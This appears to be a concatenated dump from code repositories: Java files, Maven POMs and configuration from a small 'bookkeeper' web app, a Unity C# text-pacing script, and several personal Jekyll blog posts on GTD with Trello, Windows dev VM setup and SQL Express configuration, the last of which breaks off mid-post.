        String protocol = request.getProtocol();

        filterChain.doFilter(servletRequest, servletResponse);

        // Status and content length are only known once the chain completes.
        int status = response.getStatus();
        String length = response.getHeader("Content-Length");
        if (length == null) {
            length = "-";
        }
        log.info(String.format("%s - %s [%s] \"%s %s %s\" %d %s",
                ip, user, date, method, uri, protocol, status, length));
    }

    @Override
    public void destroy() {
        // No resources to release.
    }
}
<file_sep>DROP TABLE IF EXISTS RECORD;
-- RECORD is dropped first because it holds the foreign keys referencing
-- CATEGORY and CLIENT.
DROP TABLE IF EXISTS CATEGORY;
DROP TABLE IF EXISTS CLIENT;<file_sep><project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0
http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service</groupId>
<artifactId>bookkeeper-service</artifactId>
<version>1.0-SNAPSHOT</version>
<name>Bookkeeper Service</name>
<parent>
<groupId>ru.kpfu.itis.fujitsu.lzakharov.bookkeeper</groupId>
<artifactId>bookkeeper</artifactId>
<version>1.0-SNAPSHOT</version>
</parent>
<!-- Versions are omitted below: they are managed centrally in the parent
     POM's dependencyManagement section. -->
<dependencies>
<!-- Sibling modules: domain model and DAO layer. -->
<dependency>
<groupId>ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model</groupId>
<artifactId>bookkeeper-model</artifactId>
</dependency>
<dependency>
<groupId>ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.dao</groupId>
<artifactId>bookkeeper-dao</artifactId>
</dependency>
<!-- BCrypt password hashing. -->
<dependency>
<groupId>org.mindrot</groupId>
<artifactId>jbcrypt</artifactId>
</dependency>
<dependency>
<groupId>junit</groupId>
<artifactId>junit</artifactId>
</dependency>
<dependency>
<groupId>org.mockito</groupId>
<artifactId>mockito-all</artifactId>
</dependency>
</dependencies>
</project>
<file_sep><project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0
http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.dao</groupId>
<artifactId>bookkeeper-dao</artifactId>
<version>1.0-SNAPSHOT</version>
<name>Bookkeeper DAO</name>
<parent>
<groupId>ru.kpfu.itis.fujitsu.lzakharov.bookkeeper</groupId>
<artifactId>bookkeeper</artifactId>
<version>1.0-SNAPSHOT</version>
</parent>
<!-- Versions/scopes are managed in the parent POM's dependencyManagement. -->
<dependencies>
<dependency>
<groupId>ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model</groupId>
<artifactId>bookkeeper-model</artifactId>
</dependency>
<!-- HSQLDB JDBC driver (runtime database). -->
<dependency>
<groupId>org.hsqldb</groupId>
<artifactId>hsqldb</artifactId>
</dependency>
<!-- sqltool and commons-io are test-only helpers for loading SQL fixtures. -->
<dependency>
<groupId>org.hsqldb</groupId>
<artifactId>sqltool</artifactId>
<scope>test</scope>
</dependency>
<!-- HikariCP connection pool. -->
<dependency>
<groupId>com.zaxxer</groupId>
<artifactId>HikariCP</artifactId>
</dependency>
<dependency>
<groupId>commons-io</groupId>
<artifactId>commons-io</artifactId>
<scope>test</scope>
</dependency>
<dependency>
<groupId>log4j</groupId>
<artifactId>log4j</artifactId>
</dependency>
<!-- Test stack: JUnit + Mockito + PowerMock. -->
<dependency>
<groupId>junit</groupId>
<artifactId>junit</artifactId>
</dependency>
<dependency>
<groupId>org.mockito</groupId>
<artifactId>mockito-all</artifactId>
</dependency>
<dependency>
<groupId>org.powermock</groupId>
<artifactId>powermock-module-junit4</artifactId>
</dependency>
<dependency>
<groupId>org.powermock</groupId>
<artifactId>powermock-api-mockito</artifactId>
</dependency>
</dependencies>
</project>
<file_sep><project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0
http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.webapp</groupId>
<artifactId>bookkeeper-webapp</artifactId>
<version>1.0-SNAPSHOT</version>
<name>Bookkeeper Web Application</name>
<!-- Built as a WAR; runnable locally via the Jetty plugin configured in the
     parent POM's pluginManagement. -->
<packaging>war</packaging>
<properties>
<web.context>bookkeeper</web.context>
</properties>
<parent>
<groupId>ru.kpfu.itis.fujitsu.lzakharov.bookkeeper</groupId>
<artifactId>bookkeeper</artifactId>
<version>1.0-SNAPSHOT</version>
</parent>
<dependencies>
<dependency>
<groupId>ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service</groupId>
<artifactId>bookkeeper-service</artifactId>
</dependency>
<!-- NOTE(review): unlike the other dependencies, jbcrypt pins its version
     property here instead of relying solely on dependencyManagement —
     confirm it is declared there as well. -->
<dependency>
<groupId>org.mindrot</groupId>
<artifactId>jbcrypt</artifactId>
<version>${jbcrypt.version}</version>
</dependency>
<dependency>
<groupId>javax.servlet</groupId>
<artifactId>javax.servlet-api</artifactId>
</dependency>
<!-- FreeMarker template engine for the .ftl views. -->
<dependency>
<groupId>org.freemarker</groupId>
<artifactId>freemarker</artifactId>
</dependency>
<dependency>
<groupId>org.hsqldb</groupId>
<artifactId>hsqldb</artifactId>
</dependency>
<dependency>
<groupId>log4j</groupId>
<artifactId>log4j</artifactId>
</dependency>
</dependencies>
<build>
<plugins>
<plugin>
<groupId>org.eclipse.jetty</groupId>
<artifactId>jetty-maven-plugin</artifactId>
</plugin>
</plugins>
</build>
</project>
<file_sep>jdbc.url=jdbc:hsqldb:file:/Users/lzakharov/Documents/Libraries/hsqldb-2.3.3/Databases/bookkeeperdb/bookkeeper
# NOTE(review): the JDBC URL above is an absolute, machine-specific path — it
# only works on the original developer's machine; consider a relative or
# configurable location.
jdbc.username=SA
# HSQLDB's default SA account uses an empty password.
jdbc.password=
# HikariCP pool tuning; 0 presumably disables the idle/lifetime limits —
# confirm against the HikariCP documentation for the bundled version.
jdbc.pool.idleTimeout=0
jdbc.pool.maxLifetime=0
jdbc.pool.maximumPoolSize=3
<file_sep>package ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.dao;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.dao.hsqldb.CategoryDaoHsqldb;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.Category;
import java.util.LinkedList;
/**
 * CRUD tests for {@code CategoryDaoHsqldb}; all test cases live in the
 * generic base class, this class only supplies the CATEGORY-specific fixtures.
 */
public class CategoryDaoHsqldbTest extends GenericDaoHsqldbTest<Category> {
    /** Supplies the DAO under test to the generic base class. */
    @Override
    public void initDao() {
        this.dao = new CategoryDaoHsqldb();
    }

    /** Mirrors the rows inserted by the test seed script (IDENTITY ids 0 and 1). */
    @Override
    public void createTable() {
        this.table = new LinkedList<>();
        this.table.add(new Category(0L, "category0"));
        this.table.add(new Category(1L, "category1"));
    }

    @Override
    public Category objectToUpdate() {
        return new Category(0L, "newCategory");
    }

    @Override
    public Category nonexistentObject() {
        return new Category(NOT_EXISTING_ID, "category");
    }

    @Override
    public Category newObject() {
        return new Category("newCategory");
    }
}
<file_sep>package ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.enums;
/**
 * Represents a client's gender, stored as a single CHAR in the CLIENT table.
 *
 * M - Male;
 * F - Female.
 */
public enum Gender {
    M, F
}
<file_sep>package ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service.impl;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.dao.CategoryDao;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.dao.hsqldb.CategoryDaoHsqldb;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.model.Category;
import ru.kpfu.itis.fujitsu.lzakharov.bookkeeper.service.CategoryService;
import java.util.List;
/**
 * Default {@link CategoryService} implementation, backed by the HSQLDB
 * category DAO.
 */
public class CategoryServiceImpl implements CategoryService {
    private CategoryDao categoryDao;

    public CategoryServiceImpl() {
        // Hard-wired to the HSQLDB DAO by default; replaceable via the setter.
        this.categoryDao = new CategoryDaoHsqldb();
    }

    // Setter injection point — presumably used to substitute a mock DAO in
    // unit tests; confirm against the service test suite.
    public void setCategoryDao(CategoryDao categoryDao) {
        this.categoryDao = categoryDao;
    }

    /** Returns every category from the underlying DAO. */
    @Override
    public List<Category> getAll() {
        return categoryDao.getAll();
    }
}
| 0738f602919bc6191272bce038abf72aeab11ac5 | [
"Java",
"Maven POM",
"SQL",
"INI"
] | 23 | Java | levzakharov/bookkeeper | 50066cb8e744e29ca5f3aeb1f863787644cc034d | fd59900a15453482fd496f5669f06f984cffa53a |
refs/heads/master | <repo_name>FeedFestival/Analiza-Sintactica-Romana<file_sep>/Assets/scripts/QuestionText.cs
using System.Collections;
using System.Collections.Generic;
using System.Linq;
using System.Text.RegularExpressions;
using UnityEngine;
using UnityEngine.UI;
/// <summary>
/// Paces a question's text word-by-word: splits the text into words at
/// startup and advances an internal word counter on a timer.
/// NOTE(review): the coroutine below never writes back to Question.text (or
/// any other UI element), so nothing is visibly revealed word-by-word —
/// confirm whether the progressive display was meant to happen here.
/// </summary>
public class QuestionText : MonoBehaviour
{
    // UI text component holding the full question (read once in Start).
    public Text Question;
    // Total time (seconds) over which the question's words are paced.
    public float TimeToDisplayTheQuestion;

    private string[] _words;  // the question split into words at Start
    private int _wordIndex;   // how many word-intervals have elapsed so far

    void Start()
    {
        _words = GetWords(Question.text);
        StartCoroutine(DisplayText());
    }

    // Waits one per-word interval (total time / word count), bumps the
    // counter, and re-schedules itself until every word has been counted.
    IEnumerator DisplayText()
    {
        yield return new WaitForSeconds(TimeToDisplayTheQuestion / _words.Length);
        _wordIndex++;
        if (_wordIndex != _words.Length)
            StartCoroutine(DisplayText());
    }

    // Extracts the words of <paramref name="input"/> using \b[\w']*\b,
    // dropping empty matches and trimming each word at its first apostrophe
    // (so "don't" becomes "don").
    static string[] GetWords(string input)
    {
        MatchCollection matches = Regex.Matches(input, @"\b[\w']*\b");
        var words = from m in matches.Cast<Match>()
                    where !string.IsNullOrEmpty(m.Value)
                    select TrimSuffix(m.Value);
        return words.ToArray();
    }

    // Truncates the word at its first apostrophe, if any.
    static string TrimSuffix(string word)
    {
        int apostropheLocation = word.IndexOf('\'');
        if (apostropheLocation != -1)
        {
            word = word.Substring(0, apostropheLocation);
        }
        return word;
    }
}
| acf6506686f7e8e39f30ae6aa3bb31832a4d8e2b | [
"C#"
] | 1 | C# | FeedFestival/Analiza-Sintactica-Romana | 1d7fb794b8d57bed9e9c47b83098ac674d7de6d3 | 3dfd3db8c3d7550362055cc96a1b4f05f29b3acd |
refs/heads/main | <file_sep>---
title: "Drama"
date: 2004-01-19
slashdot_url: https://slashdot.org/journal/58867/drama
---
<p>I am now associated with this bunch of <a href="http://www.twyrusdrama.org.uk/">t.a.r.t.s</a></p>
<p>Having helped out backstage with Treasure Island. Which was great fun.</p>
<file_sep>---
layout: post
title: Blog refresh - bye bye wordpress, hello jekyll
categories: [meta]
---
The old blog is gone. Move over wordpress, long live [github
pages](https://pages.github.com/).
I haven't redirected the old subdomain or urls, but the stats tell me I had no
visitors so meh. If you want something let me know and I'll repost it.
The new theme is : [Reverie](https://github.com/amitmerchant1990/reverie).
The full history and source of this blog is available in the open at
<https://github.com/timabell/timwise.co.uk>.
<file_sep>---
title: "Balls!"
date: 2004-02-14
slashdot_url: https://slashdot.org/journal/61964/balls
---
<p>Yay! My snooker table is here. Anyone fancy a game? Shame I haven't got room to put it up at the moment.</p>
<file_sep>---
layout: post
title: Enabling TCP/IP in SQL Express 2008 R2
date: '2012-05-22T11:10:00.001Z'
author: <NAME>
tags:
- howto
- sql server
modified_time: '2012-05-22T11:10:17.222Z'
thumbnail: http://3.bp.blogspot.com/-bcotqeE-qFo/T7tzqnDyBfI/AAAAAAAAAFc/sjBLaus6uu4/s72-c/sql-express-tcp-ip.png
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-7356884620087853089
blogger_orig_url: https://timwise.blogspot.com/2012/05/enabling-tcpip-in-sql-express-2008-r2.html
---
Programs > .. R2 > SQL Server Configuration Manager
Network config > Protocols > tcp/ip > enable & properties

Clear the dynamic port under IPAll
Set the TCP Port to 1433 (which is the standard sql server port).
You can then connect to "localhost" (with no instance specified) in management studio.
refs:
* [https://vgoes.wordpress.com/2007/06/05/jdbc-to-sql-server-express/](https://vgoes.wordpress.com/2007/06/05/jdbc-to-sql-server-express/)
<file_sep>---
title: Effective GTD with Trello
layout: post
---
* Learn how I've refined the GTD process with Trello for modern living.
* Get a template GTD board to kick-start your own.
GTD+Trello has really helped soothe my neurotic tendencies around todo lists. I'm often startled by starting off thinking I have more than I could ever achieve and then getting all my top priorities done in one sitting and being able to truly relax afterwards. No more nagging feeling there's something urgent at the bottom of the pile of papers somewhere.
## What is GTD?
Getting Things Done <https://en.wikipedia.org/wiki/Getting_Things_Done> is an old but effective method for organising the flood of todos that enter your life in many forms. We need it now more than ever in our infinitely connected world. And as a middle-aged working parent I need it now more than I ever did.
The point of GTD is to eliminate all the other places that you might have hidden todo lists such as
* unread emails
* your memory
* phone notes
* bits of paper
* phone screenshots
* other unstructured todo lists (Trello, Evernote etc. let me know what you use now that isn't working for you and I'll add it to the list)
And then to make your todo list something that you can almost mindlessly churn through, eliminating huge task switching costs caused by badly defined and variably sized tasks.
## Trello + GTD
The original GTD method involved bits of paper. But now we have Trello, which is an excellent fit for GTD with its cards, lists and many integrations. There's a great write-up of using Trello for GTD here: <https://blog.trello.com/gtd-getting-things-done-maximizing-productivity-trello> which I suggest you go and read first. It's how I got started, however I found I was still left building my own process and set of lists from there before it really worked for me.
Trello is great for GTD because:
* You can set up lists how you like
* There are apps so you have it everywhere
* You can forward emails to it (yay, inbox zero at last)
* It supports attaching pictures, PDFs etc.
* You can add checklists, due dates, date-stamped comments etc.
* Drag-n-drop sorting and moving of cards
* Buttons for archive / move on the cards
* A lovely cross-platform interface
* It's free!
## Disclaimer
Neither GTD nor Trello can give you more hours in the day, help you focus, get you to do things you really don't want to do, or make your tax return go away. This still requires putting the work in. Having said that, at least you will know you haven't just forgotten anything really important, it's just a bit stuck on your list. Personally with life as it is for me now I never get close to the weekly/daily GTD schedule laid out below, but that doesn't make it less valuable.
If you are looking at GTD for the same reasons as I did then beware ["the efficiency trap"](https://www.wsj.com/articles/escaping-the-efficiency-trapand-finding-some-peace-of-mind-11628262751)
## My GTD Method
Here's my actual GTD board (minus details) to give you an idea of what it looks like. You might be able to see I have far too much in Inbox and Action items as is often the case, but it doesn't take too long to clear down when I actually focus on it.

First you need to get everything you might have to do into your GTD board. Don't think too hard at this point, just ping everything to Trello and deal with it efficiently at your next GTD moment:
### Getting Everything to the Board
#### Emails
Forward emails to your GTD board "send-to-board" email address to get to inbox zero quickly. Make sure your GTD board email address is in your address book so you can just type "gtd" and hit send.

Using GTD instead of your unread email as a todo list makes inbox-zero possible again.
The subject line becomes the card title so edit that if you want. The body of the email becomes the card description so you can add to that too.
#### Web based tasks
Install [AddToAny](https://www.addtoany.com/) to send any webpage from Firefox to your GTD inbox.

#### Documents, physical objects, pictures, screenshots
Install the Trello app and use the native share buttons to share pictures, web pages etc to your GTD inbox. Use this to take photos of paper documents and physical things you need to deal with and send the picture straight to your GTD inbox on Trello.

#### Verbally Received Tasks
For when someone just says to you "oh, can you do this for me?" and you don't want to be that person that lets them down by forgetting.
If you think you are "the forgetful type" (you aren't, that's just a negative self-label compounded by habits), then you can fix it forever by just being more organised, no-one will ever know it was GTD, they just think you remembered for them.
Open up Trello on your phone or laptop and add a card. Or if it's easier write an email to your GTD board!
#### Using Alexa/Siri etc
For advanced magic teach your Siri/Alexa/Google to email to GTD by mere voice command
> Hey google, email gtd ...
Or maybe set up a custom action. (If anyone's done this send me some details and I'll expand out this section. PRs welcome!)
### GTDing
#### Inbox Processing (Daily)
Go through inbox cards and triage them as follows:
* Unactionable or not important?
* Archive the card
* or move to reference
* or move to someday.
* Less than 2 mins?
* Do now.
* For someone else?
* Move to "waiting"
* Need to just mull it over a bit?
* Move to "incubate"
* For future time/date?
* Add to [google calendar](https://calendar.google.com/) as event or timed reminder and move to "scheduled".
* More than single step to complete? (Even two really small steps counts)
* Move to "projects"
* and add a checklist.
* For some multi-step things I keep it as a single card, put it in actions but put the next step in the title (e.g. "something to do - call bob"), and when I've done that step I update the title to the next step. It's a bit less overhead than juggling multiple cards, but it's a judgement call whether it's worth a project card. I like project cards for things that are going to drag on over months.
* Finally if none of the above then:
* move to "action items"
* and edit the card to make sure it's doable in one go (add links, forms, phone numbers etc).
I've learned to do more of this in the Trello app when I have five idle minutes during the day so that when I sit down at the laptop I don't use all the time just getting GTD straight.
I add some Trello labels to the cards so that I can tell whether a card is something I can pick up in any particular situation (do I need the laptop? good phone signal? good internet? do I need to be somewhere in particular?) The situational ones are all black with an `@` prefix, e.g. `@home` or `@good-internet`.
#### Projects (Weekly)
Go through each project
* Do I still need this project (move to someday, or just archive the card if not).
* Create next action card - use the "convert checklist item to card" feature of Trello.
#### Waiting (Weekly)
* Set due dates on the cards so that they'll get highlighted if they are due chasing next time you review.
* Chase up if no action from others and past the due date (maybe fire off an email or WhatsApp).
* Archive if dealt with, or move back to inbox if it's thrown up other issues.
#### Rules - Thou Shall Not Scroll
I.e. things that I've learned knock me off track when trying to do a "GTD" session.
* DO NOT READ the articles - send them to [Pocket](https://getpocket.com/).
* DO NOT READ the newsletters - leave them as unread in mail inbox.
* NO twitter/facebook/linkedin FEED reading (posting is okay).
### Dealing With Action Items
Once your GTD board is triaged your inbox should be empty and your action items should be prioritized and full of things that you can "just do" without getting blocked. Start at the top and work down as if your boss told you to get on with it.
This is where the magic happens!
### What to do when "Action Items" is too long or not getting done
I found that after a while Action items gets overwhelming. Cards end up stuck in there forever, never quite getting to done.
To deal with this, use the "move all cards in list" feature of Trello.
You have two choices here depending on the state of your list and how important the things in it are:
* Move all cards back to Inbox and re-triage them.
* Move all the cards to "Someday" because they actually weren't that important.
Or you might pick a few to bump back to inbox then move everything else.
This gives you a complete reset, and eliminates the mental overwhelm that results from an unrealistic todo list.
You might initially think this is a failure of the GTD method, but actually without GTD you are just forgetting things that have been on your brain's todo list, and maybe some of them were actually important. With this approach you have the opportunity to decide what you want to punt to the eternal pot of "someday" with no angst that you are dropping important tasks.
If you have tasks that really are important and they are never getting done, then
* you're avoiding it and you need to move them to the top and just do them, a well formed action card is often not as bad when you actually tackle it,
* or you don't allocate sufficient time in your life for these tasks, and it's up to you if you want to adjust your schedule to get more done.
### Watch Out For
Spending all your time just arranging your GTD board and never doing any of the action items. Are you avoiding an unpleasant task? Are your tasks too big and need breaking down?
### When the lists get long
You have to make sure you're investing enough time on average for the piles not to build up and up.
When my list got to the several hundred range I needed to know for my own sanity whether I was winning or losing week by week, it's hard to remember whether the inbox was on 197 or 185 the week before. Being a bit of a systems person not afraid of a spreadsheet, I enabled the [firefox trello card counter addon](https://addons.mozilla.org/en-US/firefox/addon/firefox-trello-card-counter/), manually copied them into a spreadsheet, added a graph, and now I can see if I need to spend more or less time getting on top of it.


I've shared a [google sheets copy of the card count graph spreadsheet](https://docs.google.com/spreadsheets/d/e/2PACX-1vTJ--K37eyRik0kpBbwaGlH5p5nxfYliJDuRxkZmitntMBAnp4Cl0fW71drbvZxqQ6ApZB3LcL9XX8q/pubhtml) which you can use yourself.
## Learn more
### Podcast
Having run this system for a while, it grew to a daunting few-hundred cards in inbox/actions. To figure out what I'm doing wrong I did some more research.
The [official GTD podcast](https://gettingthingsdone.com/category/podcast-2/) is gold, hearing from the creator and his consultants on how they really use it and help clients get unstuck was really helpful.
Key points I learned:
1. Projects are not what you'd normally think of, they're just anything bigger than one action. *Anything*. (You can add another layer for big projects if that's your world).
2. The weekly review isn't just shuffling your todo pile. It's stepping back and considering the big picture, setting strategic direction, and just having time to reflect.
3. If tasks are getting stuck, or you are avoiding them it's probably because you haven't taken the time to step back and think clearly about whether it's something you actually want to do (someday/incubate/delete), and if you do then thinking about what the one next step might be (e.g. "google xx to learn more" about it).
### Articles
In no particular order, and of varying usefulness:
* <https://facilethings.com/blog/en/starting-gtd-when-you-are-busy>
* <https://lifehacker.com/the-weekly-review-how-one-hour-can-save-you-a-week-s-w-5908816>
* <https://todoist.com/productivity-methods/getting-things-done>
* <https://blog.doist.com/gtd-tips/>
* <https://www.reddit.com/r/gtd/comments/8bv3as/how_do_i_keep_my_gtd_inbox_from_overflowing_to/>
* <https://plan.io/blog/getting-things-done/>
* <https://www.taskade.com/blog/outliner-note-taking/>
* <https://www.taskade.com/blog/getting-things-done-gtd/>
* <https://www.taskade.com/blog/hierarchical-note-taking/>
## Get started with a template GTD+Trello board
You can easily create your own GTD Trello board from this template I've created for you.
The template contains:
* Preconfigured columns,
* Labels,
* Some example cards,
* A full instruction list in the inbox for daily processing,
* A butler action button for moving to "someday".
I reckon using this ready-made template will save you at least half an hour of your time just fiddling with Trello to get going. It'd also be a nice way of saying thanks if you found this article useful.

<!-- Load Stripe.js on your website. -->
<script src="https://js.stripe.com/v3"></script>
<p style="text-align: center;margin: 2em;">
Go to stripe to pay securely:
<br/>
<button
style="background-color:#6772E5;color:#FFF;padding:8px 12px;border:0;border-radius:4px;font-size:1em"
id="checkout-button-price_1HRjjxBOy2zUVRPdBXTMJ5tv"
role="link"
type="button"
>
Buy My GTD Template For £5
</button>
</p>
If you are in any way dissatisfied then let me know within 30 days and I will refund you, no questions asked.
### Business details
Payment will go to Charm Consulting Ltd., which is my wholly owned contracting company.
Registered address: Unit 4, Vista Place, Coy Pond Business Park, Ingworth Road, Poole, BH12 1JY
<div id="error-message"></div>
<script>
// Wire the buy button to Stripe-hosted Checkout for the GTD template.
(() => {
  const stripe = Stripe('pk_live_yNiRZTjor0ntOGLd5UFPeqW3');
  const checkoutButton = document.getElementById('checkout-button-price_1HRjjxBOy2zUVRPdBXTMJ5tv');
  checkoutButton.addEventListener('click', () => {
    // When the customer clicks on the button, redirect
    // them to Checkout.
    stripe.redirectToCheckout({
      lineItems: [{ price: 'price_1HRjjxBOy2zUVRPdBXTMJ5tv', quantity: 1 }],
      mode: 'payment',
      // Do not rely on the redirect to the successUrl for fulfilling
      // purchases, customers may not always reach the success_url after
      // a successful payment.
      // Instead use one of the strategies described in
      // https://stripe.com/docs/payments/checkout/fulfillment
      successUrl: 'https://timwise.co.uk/pay/success-gtd/',
      cancelUrl: 'https://timwise.co.uk/pay/cancelled/',
    }).then((result) => {
      if (!result.error) {
        return;
      }
      // If `redirectToCheckout` fails due to a browser or network
      // error, display the localized error message to your customer.
      const displayError = document.getElementById('error-message');
      displayError.textContent = result.error.message;
    });
  });
})();
</script>
## Beyond GTD
I still struggle with what to do *today* even with GTD in place. I've found the (paid) [Sunsama](https://sunsama.com/) app to be a game changer, especially as I transition to full business owner from sole contractor. You could do it without, but having an app that continuously reminds you what you planned to do today & this week makes sticking to priorities so much easier.

<file_sep>---
title: "roxio"
date: 2004-09-02
slashdot_url: https://slashdot.org/journal/82474/roxio
---
<p>I was just about to have a rant at roxio for forcing me to register to obtain updates when I discovered they've <a href="http://hardware.mcse.ms/message57667.html">sold out</a> and are likely to be up shit creek anyway. Good luck to them, I hope they pay the artists a fair percentage.</p>
<file_sep>---
layout: post
title: Building a Windows 10 Development VM from scratch
date: 2018-04-01 20:10:54.000000000 +01:00
type: post
parent_id: '0'
published: true
password: ''
status: publish
categories: []
tags: []
author:
login: timabell
email: <EMAIL>
display_name: timabell
first_name: ''
last_name: ''
permalink: "/2018/04/01/building-a-windows-10-development-vm-from-scratch/"
---
Rebuilding windows dev VM from scratch, reminds me why people put up an old build for so long. What a painful process!
I did wonder if I could get away with mssql on linux, and tried the [mssql docker image, which hosed my linux kernel](https://github.com/Microsoft/mssql-docker/issues/284). That's too many yaks for one morning.
## Windows Install
Download from <https://www.microsoft.com/en-us/software-download/windows10ISO>
* Windows 10 Fall Creators Update
* English
* 64-bit
Start a new VM with the iso. Run the install. Install hangs on windows logo. Hard reset, try again several times. Eventually it works. Even managed to crash my host entirely.
Shut down the VM with clean windows install.
Take a backup
# backing up a vm
```
cd VirtualBox\ VMs/
base=.
src=win10-2018
ls -lh $src
du -sh $src
df -h .
tar -cpC $base $src -P | pv -s $(du -sb $base/$src | awk '{print $1}') | lz4 >> $src.tar.lz4
# 8.79GiB 0:00:43 [ 205MiB/s] [=====================================================================> ] 99%
```
[Gist for backing up with lz4](https://gist.github.com/timabell/68d112d66623d9a4a3643c86a93debee#file-backup-sh-L21)
## Updates! Updates! Updates!
(as Ballmer once said?)
* poke **windows updates** until it finally decides there's no more
* reboot
* poke windows updates until it finally decides there's no more
* reboot
* poke windows updates until it finally decides there's no more
* reboot
* Install **virtualbox guest additions 5.1.34**
* reboot
* shutdown
* backup again
<div class="flickr-pic">
<a href="https://www.flickr.com/photos/tim_abell/38944561440/"
target="_blank"><img
src="https://live.staticflickr.com/4798/38944561440_829d76ac80.jpg"
style="max-height: 375px" alt="Photo of a lit pool at night"></a>
</div>
## The Snapshot Trials
[VirtualBox has a neat snapshot feature](https://www.howtogeek.com/150258/how-to-save-time-by-using-snapshots-in-virtualbox/), so you can try out a whole tree of attempts at installs then squash them into the final image or roll them back.
Take a snapshot as a starting point for trying out the eternally broken boxstarter script.
## Boxstarter
[Boxstarter script, mostly working in win 10](https://gist.github.com/timabell/608fb680bfc920f372ac) now, but so much more to do on top that, including [windows branch of dotfiles](https://github.com/timabell/dotmatrix/tree/windows) (always needs work). Read the script to see what it configures and installs.
You'll want to watch this vid at at least 2x playback speed:
<https://youtu.be/Hiz9_i67B3o>
## annoyances / setup - grab reg keys
* disable screensaver
* hide task manager when minimized
* `HKCU\Software\Microsoft\Windows\CurrentVersion\TaskManager\Preferences` - binary. sigh.settings > m
* multitasking > snap (these have been rolled in to my boxstarter, but not tested there).
* `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SnapAssist` - 0
* `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\JointResize` - 0
* all sounds off - generates 100s of reg keys, one for each event
* mute
## get ready for dev
* vs sign-in
* extension updates
* ssdt - external download popup, installs sql server 2016 localdb, takes forever, requires reboot
* azure - leave for now, also external
* jetbrains toolbox (sign in)
* resharper
* datagrip
## VS Extensions
`cinst editorconfig.vs vsvim ihateregions -y` - bit-rotten, didn't work - I should contact the [VsVim package maintainer](https://chocolatey.org/packages/vsvim). Oh never mind that would be me then.
Extensions to install manually:
* <https://marketplace.visualstudio.com/items?itemName=JaredParMSFT.VsVim>
* <https://marketplace.visualstudio.com/items?itemName=ZoltanKlinger.RelativeLineNumbers>
* <https://marketplace.visualstudio.com/items?itemName=MadsKristensen.MarkdownEditor>
* <https://marketplace.visualstudio.com/items?itemName=VisualStudioProductTeam.VisualStudio2015ColorThemeEditor> - to get solarized colours
Something to look in to <https://chocolatey.org/packages/batch-install-vsix>
## Git setup
GitExtensions defaults to the program files putty, but the chocolatey one is newer and github deprecated the comms the old one uses.
* <https://github.com/desktop/desktop/issues/4105>
* <https://blog.github.com/2018-02-23-weak-cryptographic-standards-removed/>
Change all the putty paths in git extensions to start with `C:\ProgramData\chocolatey\bin\...`

<https://git-extensions-documentation.readthedocs.io/en/latest/settings.html>
> Settings that are specific to Git Extensions and apply globally will be stored in a file called `GitExtensions.settings` either in the user’s application data path or with the program. The location is dependant on the IsPortable setting in the `GitExtensions.exe.config` file that is with the program.
i.e .`C:\Users\tim\AppData\Roaming\GitExtensions\GitExtensions`
### Key Setup
* Map a read-write folder to outside the VM to keep the putty keys in (this avoids regenerating the key if the VM is regenerated / rolled back, and also means keys aren't copied around with the VM image, which makes them a bit easier to keep track of)
* git extensions > tools > putty > generate
* set passphrase
* save pub & private keys to shared folder
* grab the public key from the generator, paste into github & bitbucket website account ssh configs
* git extensions > tools > putty > start agent > add keys
### DotMatrix
Start git bash from git extensions, not the start menu (to get ssh set up right).
```
cd /c/repo && mkdir tim && cd tim
git clone git@github.com:timabell/dotmatrix.git
cd dotmatrix/
git checkout windows
bin/install
git st
```
## VS Settings

VS > Options > Environment > Import/export > set the path to the dotmatrix copy
## resharper settings

VS > Resharper > manage options > right-click the gap > add layer > open settings file > select the one from the dotmatrix
## More settings
* VsVim settings
* git config
* email/name
## More installs
redgate tools
* dev bundle:
* sql prompt - for VS too
* compare
* data compare
* doc
* toolbelt bundle
* readyroll
## firefox
* sign-in
* ghostery settings - disable annoying purple dot
<file_sep>---
title: "I know where my towel is."
date: 2004-09-13
slashdot_url: https://slashdot.org/journal/83600/i-know-where-my-towel-is
---
<p>Ok, this is the best thing ever.<br>Anyone who reads this <b>must</b> listen to the hitch hikers guide to the galaxy. I remember this from when it was first broadcast, and I don't think there's anything I could say that does it justice.<br><a href="http://www.bbc.co.uk/radio4/hitchhikers/">http://www.bbc.co.uk/radio4/hitchhikers/</a><br>Episode 1- Tuesday 21 September 2004 6.30pm, repeated Thursday 23 September 11.00pm<br>Don't miss it.</p>
<file_sep>---
layout: post
title: Subversion to git - the pain retold
date: '2012-12-05T00:33:00.000Z'
author: <NAME>
tags:
modified_time: '2012-12-05T00:33:51.154Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-8381628268559719103
blogger_orig_url: https://timwise.blogspot.com/2012/12/subversion-to-git-pain-retold.html
---
I've spent a week reminding myself why svn sucks.
I've been using the [freetts](http://freetts.sourceforge.net/) library for
